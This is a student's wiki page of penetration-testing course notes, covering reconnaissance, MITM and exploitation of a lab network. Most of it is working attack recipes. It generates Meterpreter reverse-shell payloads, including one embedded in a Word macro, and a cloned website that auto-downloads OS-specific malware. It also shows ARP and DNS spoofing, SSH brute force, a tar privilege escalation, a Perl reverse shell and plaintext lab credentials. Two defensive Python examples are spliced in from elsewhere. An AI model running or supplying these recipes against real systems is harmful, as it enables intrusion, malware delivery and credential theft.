dardan:cyberacademy:module-4-network_pentesting
25.06.2018, module Day 1
host?
ip?
mac?
protocol? a set of rules that defines how things work,
applications: ftp, ssh, dns, snmp, ldap, http, https, rdp, pop, smtp, ntp
tcp? secure, connection oriented
udp? known as a streaming protocol, connectionless,
layered security - defence in depth
dns spoofing: redirect technique, and ARP & SSL strip techniques
session hijacking: if you have not configured the web server's cookies and sessions properly
big mac attack or
rogue AP --
WiFi Pineapple -- made by Hak5, does MITM,
thc -- thc.org, tools for rogue AP, hydra, thc-ssl-dos attacks,
hell, dark web
1337 zero day web
defcon.org, tools that are used during the conference
steganography
whitespace attack, snow, steghide
carbon black
kiosk mode (nLinux)
deceptive technology
pop, good for brute force
green threadings
ntp:
promiscuous mode: Allows a NIC to receive all traffic on the network, even if it is not addressed to this NIC
surf this platform
setoolkit: platform that has tool to clone a website
nmap UDP scan
filename.py
import os
os.
##########################################################################################
27.06.2018, module Day 2
github,
search on github
a DB where devs and hackers fix a problem in their own way and share it with others
check for exploits, techniques, ideas on how others have fixed a problem
github account
git - connects through a URL
unicorn
# git clone https://github.com/trustedsec/unicorn.git (URL taken from github).
# cd unicorn/
# python unicorn.py --help
# python unicorn.py windows/meterpreter/reverse_tcp 172.16.60.84 4455 (generates powershell_attack.txt, unicorn.rc)
# msfconsole -r unicorn.rc (starts the multi handler listening on the specified port)
copy paste to victim
the code in powershell_attack.txt is executed from a powershell or cmd on a Windows machine.
this code can and should be used with imagination as to how to get someone to execute it.
e.g.
# python -m SimpleHTTPServer 80 (publishes that file and it is executed manually)
-----------------------------------------------------------------------------------------------------------------------------------------------------
*embedded macro*
root@kali:/cyber/macro# python unicorn.py windows/meterpreter/reverse_tcp 172.16.60.84 4455 macro
the code in powershell_attack.txt is embedded in a Word macro, for example,
and sent to the victim
# msfconsole -r unicorn.rc (starts the multi handler listening on the specified port)
-----------------------------------------------------------------------------------------------------------------------------------------------------
root@kali:/PythonEmpire/Empire# pip install iptools (if missing)
root@kali:/PythonEmpire/Empire# pip install netifaces (if missing)
root@kali:/PythonEmpire/Empire/setup# ./install.sh
root@kali:/PythonEmpire/Empire# ./empire (to open)
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
(Empire: listeners/http) > set Host 172.16.60.84
(Empire: listeners/http) > execute
(Empire: listeners/http) > back
(Empire: listeners/http) > use stage
CVE mitre
Bloodhound
root@kali:/cyber/# apt-get install bloodhound
# neo4j console --to open
root@kali:/cyber# pip install bloodhound
you can delete these folders, Sami
C:\Program Files (x86)\WindowsPowerShell
C:\Program Files\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell
C:\Windows\SysWOW64\WindowsPowerShell
or raise security so that various scripts cannot be executed
https://github.com/eapowertools/ReactivateUsers/wiki/Changing-Execution-Signing-Policy-in-Powershell
##########################################################################################
29.06.2018, module Day 3
iceberg, app sec, net sec,
port knocking, security at the port level,
initial process: 1. sequence numbers, 2. the port opens for a certain time
Target:
ICEBERG: 172.16.60.65
http://172.16.60.65/
chat()
logdata()
GET /s4bryfeyzUll4hu.log
cat s4bryfeyzUll4hu.log | grep "USER" | cut -d " " -f 28 | sort -u
user : c89udwh
pass : AwSg6UVrnk%SW==
##########################################################################################
02.07.2018, module Day 4
install a tftp server ( see write up)
*theHarvester*
git clone https://github.com/laramies/theHarvester.git (to download
cd theHarvester
python theHarvester.py -d ickosovo.com -b google
python theHarvester.py -d ickosovo.com -b google -l 400
*Metagoofil*
git clone https://github.com/laramies/metagoofil.git
cd metagoofil
python metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html
*dnsrecon*
-d (domain)
-r (range)
dnsrecon -d teb-kos.com
dnsrecon -r 91.187.97.144/28
*dnscan*
cd dnscan
python dnscan.py -d teb-kos.com
bypass cloudflare:
-look through old databases (mafia cloud has the history from xx to cloudflare)
-ping cpanel, it returns the IP
-during setup they mistakenly use their own IP with the host
-brute force
*subdomain list*
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
python sublist3r.py -d name.com -t 3 -e bing
python sublist3r.py -d name.com -t 3 -e google
python sublist3r.py -d name.com -t 3 -e yahoo
site:"ickosovo" filetype:"jpeg"
inurl:"index.php"
intext:"rraci"
##########################################################################################
04.07.2018, module Day 5
##########################################################################################
06.07.2018, module Day 6
target: remote.com
find emails, domain, subdomains, IP address without cloud protection etc.
python theHarvester.py -d remote.com -b bing -l 400 (the .py script must be downloaded beforehand)
theharvester -d remote.com -l 500 -b google
theharvester -d remote.com -l 500 -b all
dnsenum remote.com
dig remote.com
host remote.com
dnsrecon -d remote.com
bypass cloudflare, websploit
##########################################################################################
09.07.2018, module4 Day 7
https://www.digitalocean.com/community --VPS solution
https://www.digitalocean.com/community/questions/how-to-config-port-knocking-on-csf-and-access-it-by-linux
**PORT KNOCKING**
https://download.configserver.com/csf.tgz
install knocked
cd /etc/csf/
nano csf.conf
TCPIN = "22" --direct access only 22
PORTKNOCKING = "80;TCP;30;1000;1001;1002;1003" --to allow knocking for port 80 with seq.
csf -r --to restart
*change default port 22 to 65500*
vi /etc/apache2/ports.conf
80 -> 65500
service apache2 restart
*do the new port 65000 with port knocking*
##########################################################################################
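To see what the PORTKNOCKING line in csf.conf actually enforces, here is an added example (not part of the course notes or of CSF itself) that models the rule as a small state machine and replays constructed connection attempts from two hosts. It assumes the rule format openport;proto;timeout;kport1;...;kportN with timeout as the number of seconds the port stays unlocked after a correct sequence.

```python
"""Defender-side model of the csf.conf PORTKNOCKING rule used above (added example).
Assumed semantics: openport;proto;timeout;kport1;...;kportN -- a source that hits the
knock ports in order unlocks openport for `timeout` seconds; an out-of-order knock
resets that source's progress."""
from dataclasses import dataclass, field


@dataclass
class KnockRule:
    open_port: int
    proto: str
    timeout: int
    sequence: tuple

    @classmethod
    def parse(cls, rule: str) -> "KnockRule":
        port, proto, timeout, *knocks = rule.split(";")
        if not knocks:
            raise ValueError("rule needs at least one knock port")
        return cls(int(port), proto.upper(), int(timeout), tuple(int(k) for k in knocks))


@dataclass
class KnockState:
    rule: KnockRule
    progress: dict = field(default_factory=dict)  # src ip -> index of next expected knock
    opened: dict = field(default_factory=dict)    # src ip -> time the port was unlocked

    def handle(self, src: str, dst_port: int, now: float) -> bool:
        """Process one inbound SYN; True means src may reach open_port right now."""
        seq, idx = self.rule.sequence, self.progress.get(src, 0)
        if dst_port == self.rule.open_port:
            opened_at = self.opened.get(src)
            return opened_at is not None and now - opened_at <= self.rule.timeout
        if dst_port == seq[idx]:
            if idx + 1 == len(seq):           # full sequence seen: unlock and reset
                self.opened[src], self.progress[src] = now, 0
            else:
                self.progress[src] = idx + 1
        elif dst_port in seq:                 # wrong order: restart (a first knock still counts)
            self.progress[src] = 1 if dst_port == seq[0] else 0
        return False


def demo() -> list:
    """Replay constructed connection attempts (src, dst_port, seconds) against the rule."""
    state = KnockState(KnockRule.parse("80;TCP;30;1000;1001;1002;1003"))
    events = [("172.16.60.72", 80, 0), ("172.16.60.72", 1000, 1), ("172.16.60.72", 1002, 2),
              ("172.16.60.72", 80, 3), ("172.16.60.79", 1000, 4), ("172.16.60.79", 1001, 5),
              ("172.16.60.79", 1002, 6), ("172.16.60.79", 1003, 7), ("172.16.60.79", 80, 8),
              ("172.16.60.79", 80, 40)]  # scanner .72 never completes; .79 completes at t=7
    return [state.handle(*e) for e in events]  # -> [False]*8 + [True, False]
```

The last event shows the timeout: 33 seconds after the sequence completed, port 80 is closed again for .79, so a client has to knock again.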
11.07.2018, module4 Day 8
DNSENUM
DNSRECON
ARCHIVE.ORG
metagoofil
theharvester
whois
ickosovo.com
info gathering
part1 - summary
part2 - info for each tool and the info extracted
part3 - conclusion
##########################################################################################
13.07.2018, module4 Day 9
missed
##########################################################################################
16.07.2018, module4 Day 10
https://www.hak5.org/
alfa network card
hsps
MITM-ARP-spoofing
driftnet --tries to capture images with http links
dnsspoof --
arpspoof --sends probe requests (to act like the gw)
ettercap --packet capture tool ??
urlsnarf --dumps captured urls
zANTI --for redirecting requests
ARP?
sniffing
poisoning
vector of attack,
------------------------------------------------------------------------------------------
**MITM man in the middle**
echo 1 > /proc/sys/net/ipv4/ip_forward --enable IP forwarding (/proc)
.60.79 win7 victim
.60.72 kali hacker machine
.60.1 original Gateway
arpspoof -i eth0 -t 172.16.60.79 172.16.60.1
arpspoof -i eth0 -t 172.16.60.1 172.16.60.79
start traffic from the victim
ettercap -T -q -i eth0
----------------------------------------------------------------------------------------
**dnsspoofing**
nano host.txt
172.16.60.72 www*
172.16.60.72 ickosovo.com
arpspoof -i eth0 -t 172.16.60.79 172.16.60.1
arpspoof -i eth0 -t 172.16.60.1 172.16.60.79
dnsspoof -i eth0 -f host.txt
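Both the MITM and the dnsspoofing recipes above start with arpspoof answering for the gateway and the victim at once. As an added example (not from the course notes), here is a passive detector that replays a constructed ARP-reply trace of the lab and alerts on the two signals a defender can see on the wire: an IP whose MAC changes, and one MAC answering for several IPs. The MAC addresses are made up; only the IPs come from the notes.

```python
"""Passive ARP-spoof detector for the MITM lab above (added example, constructed MACs).
It replays ARP replies as (seconds, sender_ip, sender_mac) and raises an alert when
an IP's MAC changes or when one MAC starts answering for several IPs, which is what
running arpspoof in both directions from the Kali box looks like on the wire."""
from collections import defaultdict
from typing import Dict, List, Tuple

ArpReply = Tuple[float, str, str]


class ArpWatch:
    def __init__(self, pinned: Dict[str, str]) -> None:
        self.table = {ip: mac.lower() for ip, mac in pinned.items()}  # ip -> mac (pinned or learned)
        self.claims: Dict[str, set] = defaultdict(set)                # mac -> ips it answers for
        self.alerts: List[str] = []

    def observe(self, t: float, ip: str, mac: str) -> None:
        mac = mac.lower()
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac                     # first sighting: learn it
        elif known != mac:
            # keep the pinned/learned mapping; a real NIC swap should be re-pinned by an admin
            self.alerts.append(f"{t:.0f}s: {ip} moved from {known} to {mac}")
        if ip not in self.claims[mac]:
            self.claims[mac].add(ip)
            if len(self.claims[mac]) > 1:
                self.alerts.append(f"{t:.0f}s: {mac} now answers for {sorted(self.claims[mac])}")


def replay(replies: List[ArpReply], pinned: Dict[str, str]) -> List[str]:
    watch = ArpWatch(pinned)
    for t, ip, mac in replies:
        watch.observe(t, ip, mac)
    return watch.alerts


# Constructed trace of the lab: gateway .1, Win7 victim .79, Kali attacker .72
LAB_REPLIES: List[ArpReply] = [
    (0, "172.16.60.1", "00:0c:29:aa:aa:01"),
    (1, "172.16.60.79", "00:0c:29:bb:bb:79"),
    (2, "172.16.60.72", "00:0c:29:cc:cc:72"),
    (10, "172.16.60.1", "00:0c:29:cc:cc:72"),   # arpspoof -t .79 .1: Kali claims the gateway
    (11, "172.16.60.79", "00:0c:29:cc:cc:72"),  # arpspoof -t .1 .79: Kali claims the victim
]


def demo() -> List[str]:
    """Gateway MAC pinned by the admin; the rest is learned on first sight."""
    return replay(LAB_REPLIES, {"172.16.60.1": "00:0c:29:aa:aa:01"})
```

Pinning the gateway MAC matters because the first reply a monitor sees may already be the spoofed one; with the pin, the change is caught regardless of start-up order.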
--------------------------------------------------------------------------------------
**clone a website using set toolkit** (the web is exported to /root/.set/web-clone)
move index.html to /var/www/html
in /var/www/html generate a malware .exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.79 LPORT=5560 -f exe -o test-update.exe
edit index.html -- add: <meta http-equiv="refresh" content="1;url=test-update.exe">
service apache2 start
http://<apache2 ip>/index.html (the web opens and the file starts downloading)
##########################################################################################
18.07.2018, module4 Day 11
Stage1
build malware, upload in fake web, auto download OS base
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.72 LPORT=5560 -f elf -o test-update.elf
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.60.72 LPORT=5560 R>test-update.apk
<!DOCTYPE HTML>
<html>
<head>
<script>
  if (navigator.appVersion.indexOf("Win") != -1) {
    window.location.assign("winshell.exe");
  }
  if (navigator.appVersion.indexOf("Mac") != -1) {
    window.location.assign("");
  }
  if (navigator.appVersion.indexOf("Android") != -1) {
    window.location.assign("androidshell.apk");
  }
  if (navigator.appVersion.indexOf("Linux x86_64") != -1) {
    window.location.assign("linuxshell.elf");
  }
</script>
</head>
</html>
------------------------------------------------------------
msf
set
mitm
##########################################################################################
20.07.2018, module4 Day 12
target 1
172.16.60.72
user:ick
target2
172.16.60.69, portknocking, ssh 1000 5000 9000
nmap -sV 172.16.60.69
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.5p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.27 ((Ubuntu))
MAC Address: 00:DB:DF:54:18:07 (Intel Corporate)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------
dirb http://172.16.60.72 --directory
hydra -l ick -P /root/Desktop/rockyou.txt 172.16.60.72 ssh --brute force
sudo -u root tar cf /dev/null /temp/exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash --gives root access
#nc -z 172.16.60.69 1000 5000 9000
#ssh arben@172.16.60.69
#arben@172.16.60.69's password:arben1!1
$ :)
next step privilege escalation
$ sudo -l --found (ALL) NOPASSWD: /usr/bin/perl
sudo -u root
root@kali:/# nc -lvp 80 --e hap nje port
$ sudo perl rv1.pl --perl reverse shell found in github
edit: our machine's IP and the port you set listening with nc -lvp 80, for example
dardan/cyberacademy/module-4-network_pentesting.txt · Last modified: 2018/08/24 17:09 by dardan
